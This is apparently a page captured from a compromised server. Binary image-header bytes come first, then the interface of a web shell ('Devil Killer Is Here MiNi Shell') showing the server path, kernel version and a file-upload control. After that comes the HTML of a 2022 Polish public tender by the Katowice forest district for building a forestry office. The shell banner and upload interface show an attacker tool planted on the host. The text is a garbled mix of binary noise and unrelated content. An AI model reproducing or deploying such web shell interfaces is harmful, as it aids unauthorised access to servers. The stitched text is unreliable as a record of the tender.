JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220412/0011950101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kancelarii podwójnej SKL 2 L. Górki i L. Lędziny </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE LASY PAŃSTWOWE NADLEŚNICTWO KATOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 272536250</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kijowska 37 B</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-754</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 2525141</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">katowice@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://katowice.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kancelarii podwójnej SKL 2 L. Górki i L. Lędziny </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-775c1ce9-ba53-11ec-9f44-6e63702cb2f7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00119501</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-04-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00119214/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Budowa kancelarii podwójnej SKL2 L. Górki i L. Lędziny</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie prowadzone jest w języku polskim. Komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu platformy przetargowej miniPortal oraz poczty elektronicznej:<br/>katowice@katowice.lasy.gov.pl z zastrzeżeniem, że składanie ofert oraz oświadczeń, odbywa się<br/>wyłącznie poprzez platformę miniPortal https://miniportal.uzp.gov.pl. Wykonawca zamierzający wziąć<br/>udział w niniejszym postępowaniu o udzielenie zamówienia publicznego, musi się zarejestrować<br/>platformie miniPortal. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej za pomocą platformy miniPortal, zostały opisane na stronie<br/>https://miniportal.uzp.gov.pl. Sposób sporządzenia, wysyłania i odbierania korespondencji<br/>elektronicznej musi być zgodny z wymaganiami określonymi w rozporządzeniu wydanym na podstawie<br/>art. 70 PZP. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia<br/>akceptuje warunki korzystania z platformy miniPortal. Wykonawca może zwrócić się do zamawiającego<br/>za pośrednictwem platformy miniPortal lub na adres email: katowice@katowice.lasy.gov.pl z<br/>wnioskiem o wyjaśnienie treści SWZ. Zamawiający udzieli wyjaśnień niezwłocznie, jednak nie później<br/>niż na 2 dni przed terminem składania ofert (udostępniając je na platformie przetargowej), pod<br/>warunkiem, że wniosek o wyjaśnienie treści SWZ wpłynął do zamawiającego nie później niż na 4 dni<br/>przed upływem terminu składania ofert. W przypadku gdy wniosek o wyjaśnienie treści SWZ nie<br/>wpłynie w terminie, zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz przedłużenia<br/>terminu składania ofert. Przedłużenie terminu składania ofert nie wpływa na bieg terminu składania<br/>wniosku o wyjaśnienie treści SWZ. Przyjmuje się, że dokument wysłany przy użyciu Platformy<br/>przetargowej został doręczony Wykonawcy w sposób umożliwiający zapoznanie się z jego treścią, w<br/>dniu jego przekazania na Platformę przetargową.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozp. Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: administratorem Pani/Pana danych osobowych jest Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Katowice, ul. Kijowska 37 b, 40-754 Katowice; w sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych, za pomocą, poczty elektronicznej na adres e-mail: katowice@katowice.lasy.gov.pl (szczegółowe informacje znajdują się na stronie https://www.gov.pl/web/nadlesnictwo-katowice/iod); Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na Zamawiającym; odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; Posiada Pan/Pani: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego UE lub państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.2.2021.MW</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 449688,32 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest budowa budynku biurowego kancelarii podwójnej SKL 2 Leśnictwa Górki i Leśnictwa Lędziny na części działki nr 351/59 w miejscowości Katowice przy ulicy Irysowej/Zakole. Budynek kancelarii w części parterowej ma składać się z: poczekalni, kuchni, 2 magazynów, 2 pomieszczeń biurowych i łazienki. Część poddaszowa ma mieć<br/>charakter nieużytkowy, gospodarczy. Konstrukcja: zaprojektowano jednosegmentowy, jednokondygnacyjny budynek o ścianowym ustroju nośnym z bloczków betonu komórkowego.<br/>Budynek ma być posadowiony na żelbetowej monolitycznej płycie gr 25 cm betonu konstrukcyjnego C20/25 (B25) zbrojonej stalą klasy A-IIIN. Dach w konstrukcji krokwiowo – jętkowej. Powierzchnia użytkowa: 50,12 m2. Powierzchnia zabudowy: 67,95 m2. Kubatura: 340,00 m3. Budynek wyposażony będzie w następujące instalacje: wodociągową, kanalizacji<br/>sanitarnej (bezodpływowy zbiornik na nieczystości), gazową, c.o. (kocioł gazowy dwufunkcyjny, kondensacyjny z zamkniętą komorą spalania), elektryczną, odgromową, teletechniczną, alarmową, słaboprądową). W skład projektu wchodzą: budynek kancelarii podwójnej, dojście i<br/>zjazd z ul. Irysowej, plac manewrowy z parkingiem, placyk na pojemniki śmieciowe, ogrodzenia. Zamawiający uzyskał Decyzję RBDEC-0349/2021 z dnia 17.03.2021 zatwierdzającą projekt budowlany i udzielającą pozwolenia na budowę. Szczegółowy opis i zakres przedmiotu zamówienia oraz wymagania dotyczące wykonania przedmiotu zamówienia – zawiera Załącznik nr 1. i nr 2 i nr 3 do niniejszej SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44210000-5 - Konstrukcje i części konstrukcji</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45262310-7 - Zbrojenie</p> <p class="mb-0">45262311-4 - Betonowanie konstrukcji</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45333000-0 - Roboty instalacyjne gazowe</p> <p class="mb-0">45342000-6 - Wznoszenie ogrodzeń</p> <p class="mb-0">45421100-5 - Instalowanie drzwi i okien, i podobnych elementów</p> <p class="mb-0">45421146-9 - Instalowanie sufitów podwieszanych</p> <p class="mb-0">45431000-7 - Kładzenie płytek</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty na wykonanie zadania – Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena ofertowa (C) – 60 %,<br/>2)	Okres gwarancji (G) – 40 %,<br/>2.	Sposób obliczania punktów dla poszczególnych kryteriów<br/>1)	W ramach kryterium „Cena ofertowa” ocena ofert zostanie dokonana przy zastosowaniu wzoru: <br/> Cn <br/>C = ------------ x100 pkt x 60 %<br/> Co gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w formularzu oferty <br/><br/>2)	W ramach kryterium „Okres gwarancji” ocena ofert zostanie przeprowadzona wg poniższych wytycznych:<br/>Sposób oceny:<br/>- zaproponowany okres gwarancji 60 miesięcy – 0 pkt.<br/>- zaproponowany okres gwarancji 61- 70 miesięcy – 20 pkt.<br/>- zaproponowany okres gwarancji 71 miesięcy i więcej – 40 pkt.<br/>Minimalny okres gwarancji wymagany przez Zamawiającego wynosi 60 miesięcy.<br/>W przypadku braku wpisania w formularzu oferty okresu gwarancji, Zamawiający przyzna w tym kryterium 0 pkt i przyjmie oferowany okres gwarancji jako 60 miesięcy.<br/><br/>3)	Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru:<br/>L = C + G <br/>gdzie:<br/>L – całkowita liczba punktów,<br/>C – liczba punktów przyznana w ramach kryterium „Cena”,<br/>G – punkty uzyskane w kryterium „Okres gwarancji”.<br/>3.	Za ofertę najkorzystniejszą uznana zostanie oferta, oceniona w oparciu o podane wyżej kryteria, która w sumie uzyska największą ilość punktów spośród ofert nieodrzuconych i spełniających wszystkie wymagania określone przez Zamawiającego w treści specyfikacji. <br/>4.	W sytuacji, gdy Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że złożone oferty otrzymały taką samą liczbę punktów to pierwszeństwo wyboru będzie miała oferta z niższą ceną. W przypadku zaoferowania przez Wykonawcę takiej samej ceny i okresu gwarancji to pierwszeństwo wyboru będzie miała oferta, która została złożona wcześniej. <br/>5.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert lub innych składanych dokumentów lub oświadczeń. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.<br/>6. Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (tekst jedn.: Dz. U. z 2021 r. poz. 685 z późn.zm.) dla celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.<br/>7. W ofercie, o której mowa w ust. 6, Wykonawca ma obowiązek:<br/>7.1. poinformowania Zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku podatkowego;<br/>7.2. wskazania nazwy (rodzaju) towaru, roboty lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>7.3. wskazania wartości towaru, roboty lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>7.4. wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą Wykonawcy, będzie miała zastosowanie.<br/>8. Zamawiający wybiera najkorzystniejszą ofertę w terminie związania ofertą określonym w SWZ.<br/>9. Jeżeli termin związania ofertą upłynie przed wyborem najkorzystniejszej oferty, Zamawiający wezwie Wykonawcę, którego oferta otrzymała najwyższą ocenę, do wyrażenia, w wyznaczonym przez Zamawiającego terminie, pisemnej zgody na wybór jego oferty.<br/>10. W przypadku braku zgody, o której mowa w ust. 9, oferta podlega odrzuceniu, a Zamawiający zwraca się o wyrażenie takiej zgody do kolejnego Wykonawcy, którego oferta została najwyżej oceniona, chyba że zachodzą przesłanki do unieważnienia postępowania.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania oraz spełniają warunki udziału w postępowaniu określone przez zamawiającego w ogłoszeniu i niniejszej SWZ. Zamawiający wymaga wykazania przez wykonawcę spełniania warunku określonego w art. 112 ust. 2 PZP dotyczącego 1.1.Zdolności do występowania w obrocie gospodarczym i uprawnień do prowadzenia określonej działalności zawodowej:<br/>Zamawiający nie określa warunków udziału w postępowaniu w tym zakresie 1.2.Sytuacji<br/>ekonomicznej lub finansowej. Zamawiający uzna, że Wykonawca jest w sytuacji ekonomicznej i finansowej, jeśli wykaże, że: dysponuje środkami finansowymi lub zdolnością kredytową – w kwocie nie mniejszej niż: 200 000,00zł; posiada polisę lub inny dokument ubezpieczenia<br/>potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 400 000,00 zł ważną przez cały okres obowiązywania umowy lub odnawianą w trakcie trwania umowy. 1.3 Zdolności technicznej lub<br/>zawodowej – w zakresie: 1.3.1. Posiadania wiedzy i doświadczenia; Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie niezbędne do wykonania zamówienia, jeżeli w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres działalności jest<br/>krótszy, w tym okresie), Wykonawca składający ofertę wykaże, że: 1) zrealizował przynajmniej dwie oddzielne roboty budowlane polegające na budowie budynku mieszkalnego lub budynku<br/>użyteczności publicznej, lub budynku rekreacyjnego w technologii murowanej wraz z instalacjami sanitarnymi i elektrycznymi za kwotę nie mniejszą niż 200 000,00 zł brutto każda (za 1 budynek) z podaniem ich wartości, daty i miejsca wykonania oraz załączy dokumenty potwierdzające, że roboty te zostały wykonane należycie. 1.3.2.Dysponowania osobami zdolnymi do wykonania zamówienia; 1. Zamawiający uzna, że Wykonawca dysponuje osobami<br/>zdolnymi do wykonania zamówienia, jeżeli wykaże: 1) dysponowanie kierownikiem budowy posiadającym uprawnienia budowlane, bez ograniczeń, w specjalności konstrukcyjno budowlanej,<br/>2) dysponowanie kierownikiem robót posiadającym uprawnienia budowlane, bez ograniczeń, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, <br/>3) dysponowanie kierownikiem robót posiadającym uprawnienia<br/>budowlane, bez ograniczeń, w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, <br/>4) dysponowanie min. 5 pracownikami zatrudnionymi na podstawie umowy o pracę biorącymi czyny udział przy realizacji tego zamówienia zgodnie z pkt. 7 rozdział V SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o 